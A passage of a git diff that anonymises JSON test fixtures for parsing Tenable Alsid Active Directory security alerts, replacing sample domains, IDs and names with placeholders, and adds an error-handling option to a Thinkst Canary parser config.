\"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON", "properties": { - "ADdevianceID": 1958016, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", + "ADobject": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp", "PrivilegesPath": "CN=Adminintrator,CN=Users,DC=emae,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John DOE" } } diff --git a/Tenable/alsid/tests/event_2.json b/Tenable/alsid/tests/event_2.json index 9a09badeb..99cb8e395 100644 --- a/Tenable/alsid/tests/event_2.json +++ b/Tenable/alsid/tests/event_2.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,11 +13,11 @@ "outcome": "success", "outcome_reason": "R-DELEG-PRIVUSERS-NOT-PROTECTED", "properties": { - "ADdevianceID": 1920595, - "ADdomainName": "emea.corp", + "ADdevianceID": 1920000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp", - "PrivilegesPath": "CN=Backup,CN=Builtin,DC=emea,DC=corp", + "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp", + "PrivilegesPath": "CN=Backup,CN=Builtin,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", "eventID": "50666797" diff --git a/Tenable/alsid/tests/event_3.json b/Tenable/alsid/tests/event_3.json index 2611ce026..040246618 100644 --- a/Tenable/alsid/tests/event_3.json +++ b/Tenable/alsid/tests/event_3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,14 +13,14 @@ "outcome": "success", "outcome_reason": "R-NOT-IN-WHITELIST", "properties": { - "ADdevianceID": 1959337, - "ADdomainName": "emea.corp", + "ADdevianceID": 1959000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "CN=Main Administrators,CN=Users,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", - "eventID": "51204253" + "eventID": "51200000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/event_4.json b/Tenable/alsid/tests/event_4.json index 418ddd8b1..d3deeae5d 100644 --- a/Tenable/alsid/tests/event_4.json +++ b/Tenable/alsid/tests/event_4.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON-ACROSS-TRUST", "properties": { - "ADdevianceID": 1958033, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John Doe" } } diff --git a/Tenable/alsid/tests/ioe_security_alert1.json b/Tenable/alsid/tests/ioe_security_alert1.json index b149081cb..dbe95b13a 100644 --- a/Tenable/alsid/tests/ioe_security_alert1.json +++ b/Tenable/alsid/tests/ioe_security_alert1.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"", "event": { "kind": "alert", "outcome": "success" @@ -14,13 +14,13 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", - "TrusteeCn": "GustavoFring", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", + "TrusteeCn": "JohnDoe", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert3.json b/Tenable/alsid/tests/ioe_security_alert3.json index abfdf8cc5..dd4f9ac7f 100644 --- a/Tenable/alsid/tests/ioe_security_alert3.json +++ b/Tenable/alsid/tests/ioe_security_alert3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"", "event": { "kind": "alert", "outcome": "success" @@ -14,12 +14,12 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert4.json b/Tenable/alsid/tests/ioe_security_alert4.json index 4b340737e..6c89b301f 100644 --- a/Tenable/alsid/tests/ioe_security_alert4.json +++ b/Tenable/alsid/tests/ioe_security_alert4.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", "event": { "kind": "alert", "outcome": "success" @@ -14,9 +14,9 @@ "outcome_reason": "R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp", + "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp", "AttributeName": "inf-system_access-lockoutbadcount", "OuCn": "Packaging", "alertID": 1, diff --git a/Tenable/alsid/tests/trailflow_alert1.json b/Tenable/alsid/tests/trailflow_alert1.json index 2fa82823e..b41cd7fcc 100644 --- a/Tenable/alsid/tests/trailflow_alert1.json +++ b/Tenable/alsid/tests/trailflow_alert1.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp", + "ADobject": "CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "whenchanged", "alsidAttributeValue": "\"2020-01-09T09:24:41.0000000Z\"", - "eventID": "2434", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert2.json b/Tenable/alsid/tests/trailflow_alert2.json index a26f52b7b..38f57b925 100644 --- a/Tenable/alsid/tests/trailflow_alert2.json +++ b/Tenable/alsid/tests/trailflow_alert2.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"2432\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" useraccountcontrol=\"\"DONT_EXPIRE NORMAL \"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_OU2,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "useraccountcontrol", "alsidAttributeValue": "\"DONT_EXPIRE NORMAL \"", - "eventID": "2432", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert3.json b/Tenable/alsid/tests/trailflow_alert3.json index 0d3b1d784..b073ae6e5 100644 --- a/Tenable/alsid/tests/trailflow_alert3.json +++ b/Tenable/alsid/tests/trailflow_alert3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856795\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts\" \"7856000\" \"ACL change\" \"ntsecuritydescriptor\"=\"\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\User\\Scripts", "alertID": 8, "alsidAttributeName": "\"ntsecuritydescriptor\"", - "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607746426-5380147357-40655D:AI(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", - "eventID": "7856795", + "alsidAttributeValue": "\"O:S-1-5-21-1519513455-2607000000-5380140000-406000:AI(A;OICIID;FA;;;S-1-5-21-1519510000-2607746426-5380147357-512)(A;OICIID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-519)(A;OICIID;0x1200a9;;;S-1-5-11)(A;OICIID;0x1200a9;;;S-1-5-9)(A;OICIID;FA;;;S-1-5-18)(A;ID;FA;;;S-1-5-21-1519513455-2607746426-5380147357-40655)(A;OICIIOID;FA;;;S-1-3-0)\"", + "eventID": "7856000", "eventType": "ACL change" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert4.json b/Tenable/alsid/tests/trailflow_alert4.json index 1d4ae660f..a2179f541 100644 --- a/Tenable/alsid/tests/trailflow_alert4.json +++ b/Tenable/alsid/tests/trailflow_alert4.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"" }, "expected": { - "message": "\"1\" \"8\" \"AD.FOOBAR.COM\" \"AD\" \"\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855399\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", + "message": "\"1\" \"8\" \"AD.TEST.COM\" \"AD\" \"\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI\" \"7855000\" \"New object\" \"gptini-displayname\"=\"\"Nouvel objet Strat\u00e9gie de groupe\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -13,12 +13,12 @@ "outcome": "success", "properties": { "ADdomainName": "AD", - "ADforestName": "AD.FOOBAR.COM", - "ADobject": "\\\\AD.FOOBAR.COM\\sysvol\\AD.FOOBAR.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", + "ADforestName": "AD.TEST.COM", + "ADobject": "\\\\AD.TEST.COM\\sysvol\\AD.TEST.COM\\Policies\\{SEK01A10-T35T-TEST-T35T-5EKO1AIO10}\\GPT.INI", "alertID": 8, "alsidAttributeName": "\"gptini-displayname\"", "alsidAttributeValue": "\"Nouvel objet Strat\u00e9gie de groupe\"", - "eventID": "7855399", + "eventID": "7855000", "eventType": "New object" }, "type": "trailflow" diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md new file mode 100644 index 